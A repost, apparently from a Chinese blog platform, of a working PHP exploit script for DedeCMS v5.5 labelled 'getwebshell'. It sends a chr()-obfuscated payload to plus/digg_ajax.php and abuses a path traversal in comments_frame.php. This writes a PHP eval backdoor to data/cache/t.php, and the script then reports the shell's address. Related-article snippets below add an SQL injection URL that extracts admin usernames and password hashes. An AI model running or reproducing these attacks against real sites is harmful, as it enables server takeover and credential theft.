dedecms v5.5 final getwebshell exploit(datalistcp.class.php)

最新推荐文章于 2021-03-12 08:28:36 发布
最新推荐文章于 2021-03-12 08:28:36 发布
阅读量150 收藏
点赞数
文章标签: php
测试方法:
@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. <?php
    2. print_r('
    3. +----------------------------------------+
    4. dedecms v5.5 final getwebshell exploit
    5. +----------------------------------------+
    6. ');
    7. if($argc <3){
    8. print_r('
    9. +----------------------------------------+
    10. Usage: php '.$argv[0].' host path
    11. host: target server (ip/hostname)
    12. path: path to dedecms
    13. Example:
    14. php '.$argv[0].' localhost /dedecms/
    15. +----------------------------------------+
    16. ');
    17. exit;
    18. }
    19. error_reporting(7);
    20. ini_set('max_execution_time',0);
    22. $host = $argv[1];
    23. $path = $argv[2];
    25. $post_a ='plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
    26. $post_b ='needCode=aa/../../../data/mysql_error_trace';
    27. $shell ='data/cache/t.php';
    29. get_send($post_a);
    30. post_send('plus/comments_frame.php',$post_b);
    31. $content = post_send($shell,'t=echo tojen;');
    33. if(substr($content,9,3)=='200'){
    34. echo "\nShell Address is:".$host.$path.$shell;
    35. }else{
    36. echo "\nError.";
    37. }
    38. function get_send($url){
    39. global $host, $path;
    40. $message ="GET ".$path."$url HTTP/1.1\r\n";
    41. $message .="Accept: */*\r\n";
    42. $message .="Referer: http://$host$path\r\n";
    43. $message .="Accept-Language: zh-cn\r\n";
    44. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    45. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    46. $message .="Host: $host\r\n";
    47. $message .="Connection: Close\r\n\r\n";
    48. $fp = fsockopen($host,80);
    49. if(!$fp){
    50. echo "\nConnect to host Error";
    51. }
    52. fputs($fp, $message);
    54. $back ='';
    56. while(!feof($fp))
    57. $back .= fread($fp,1024);
    58. fclose($fp);
    59. return $back;
    61. }
    62. function post_send($url,$cmd){
    64. global $host, $path;
    65. $message ="POST ".$path."$url HTTP/1.1\r\n";
    66. $message .="Accept: */*\r\n";
    67. $message .="Referer: http://$host$path\r\n";
    68. $message .="Accept-Language: zh-cn\r\n";
    69. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    70. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    71. $message .="Host: $host\r\n";
    72. $message .="Content-Length: ".strlen($cmd)."\r\n";
    73. $message .="Connection: Close\r\n\r\n";
    74. $message .= $cmd;
    75. $fp = fsockopen($host,80);
    76. if(!$fp){
    77. echo "\nConnect to host Error";
    78. }
    79. fputs($fp, $message);
    81. $back ='';
    83. while(!feof($fp))
    84. $back .= fread($fp,1024);
    85. fclose($fp);
    86. return $back;
    87. }
    88. ?>
weixin_34198762
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)
午夜安全
11-17 3645
WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2) 接着上一篇,我们已经获取到一个webshell,这篇文章是后续提权及漏洞利用。(1)systeminfo生成文件systeminfo >dedecms.txt(2)更新windows-exploit-suggester下载windows-exploit-suggester.py后,先安装xlrd,之后才可以更新。...
[分析]-DedeCMS全版本通杀SQL注入漏洞
Nixawk
05-04 5653
mysql> SELECT s.*,t.* FROM -> `dede_member_stow` AS s LEFT JOIN -> `dede_member_stowtype` AS t ON s.type=t.stowname -> WHERE s.aid='1' -> AND s.type='\\' or mid=@`\\'` /*!50000unio
织梦dedecms5.5爆最新漏洞,可得到webshell
weixin_33788244的博客
12-03 555
影响版本:Dedecms 5.5漏洞描述:漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考 by:Flyh4t*...
dedecms织梦挂马被黑首页频繁被篡改后门漏洞清理
gysea123321的博客
10-31 1317
dedecms织梦挂马被黑首页频繁被篡改后门漏洞清理?最近不少客户反映首页被篡改,登录服务器查看没有被上传异常文件,但是首页生成后,有一段异常且被加密过的代码。更换内核后,还是依然出现,通过研究发现,首页模板被加入了【自定义宏标记】内容,标签为:{dede:mytag typeid='0' name=''/} ,内容为一段异常代码。异常代码如图: DEDECMS 5.7最新版本,包括之前的5...
一次特别的DedeCMS站点渗透
moon fairy's blog
07-23 4823
 一系列故事的开端: 这是搜到的一个Dede站点的后台 路径为/dede  获得到该站点的用户名以及密码后(这里不具体说明),输入用户名和密码之后就进入了后台,并且下意识的打开了文件管理器 不过管理员也不是等闲之辈,早已卸载该模块 于是,我找到了另一处可以生成PHP文件的地方 在”标签源码管理“这里可以创建PHP脚本文件 去掉默认的代码,写入eval代码,点击保存,文...
dedecms 漏洞汇总
热门推荐
积木网络
02-29 1万+
Dedecms 5.6 rss注入漏洞   http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2)) AND "'" AND updatexml(1,(SELECT CONCAT(0x5b,uname,0x3a,MID(pwd,4,16),0x5d) FROM dede_admin),1)#'][0]=1 DedeCms v5.6 嵌入
GetWebShell增强版.rar
04-11
用于MSSQL差异备份 功能强大 ... 不解释
GetWebShell
09-29
《GetWebShell:深入理解与防范》 在网络安全领域,"GetWebShell"是一个至关重要的概念,它涉及到网站安全、服务器防护以及恶意攻击者利用的技术手段。本文将深入探讨GetWebShell的含义、工作原理、危害,以及如何...
GetWebshell
11-25
E:\武器库\tool\攻\漏洞利用\程序系统类(Web)
GetWebShell(XIAOLU经典作品)
10-18
GetWebShell(XIAOLU经典作品),有DB权限就可以备份一个小马出来,超级好用的小工具。
getwebshell
10-06
getwebshell
dedecms漏洞组合拳拿站(渗透笔记)
一个安全研究员
07-13 1万+
如题
DedeCMS历史漏洞复现之代码执行漏洞
jojo705的博客
03-25 7972
本文介绍的漏洞虽然不是最新漏洞,但意在让初学者了解漏洞复现的基本流程。 首先了解一下什么是CMS。CMS是Content Management System的缩写,意为"内容管理系统"。内容管理系统是一种位于WEB 前端(Web 服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文...
DEDECMS 漏洞汇总
weixin_30527551的博客
08-08 6693
日期:2019-08-08 10:20:28 更新: 作者:Bay0net 介绍: 0x01、组合拳拿 shell 漏洞版本:v5.5 - v5.7 前台任意用户密码重置 首先注册一个账户,账户名为 0000001,此处注册的账户,前面是多个 0,后面是 1 就行。 注册链接: http://192.168.31.59/member/index_do.php?fmd...
datalistcp.class.php,dedecms二次开发之动态分页类,常用于展示文档列表,datalistcp.class.php...
weixin_28753691的博客
03-12 92
在进行dedecms二次开发时,经常会用到展示文档列表,比如前台页面显示留言列表等等!或者其他一些自定义的信息列表!datalistcp.class.php使用方法:一、引入类文件:require_once(DEDEINC.'/datalistcp.class.php');二、使用方法:$dl = new DataListCP();$dl->pageSize = 25;//设定每页显示记录数...
plus/digg_ajax.php,dedecms v5.5 final getwebshell exploit(datalistcp.class.php)
weixin_42370927的博客
03-10 400
<?phpprint_r('+----------------------------------------+dedecms v5.5 final getwebshell exploit+----------------------------------------+');if ($argc < 3) {print_r('+-----------------------------...
批量修复dede mysql_err漏洞
iteye_16035的博客
03-08 529
本来想用查找替换,但是符号太麻烦了。考虑到文件都是一样的,只好先修改一个,然后替换就行了。 find ./webfiles -name "dedesql.class.php" -print -exec cp -f ./dedesql.class.php {} \; -------------------------------- 漏洞测试: 1、http://xxx...
Web_PHP_DedeCMS_datalistcp.class.php 动态分页类使用案例;
cyb专栏
08-26 1135
在/plus下面新建datalistDemo.php文件
datalistcp.class.php,datalistcp.class.php 动态分页类
weixin_28913687的博客
03-12 86
类文件include/datalistcp.class.php适用范围:数据量不大的数据分页使用方法:查看源码复制到粘贴板打印?$dl = new DataListCP();$dl->pageSize = 25; //设定每页显示记录数(默认25条)$dl->SetParameter($key,$value); //设定get字符串的变量$dl = new...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值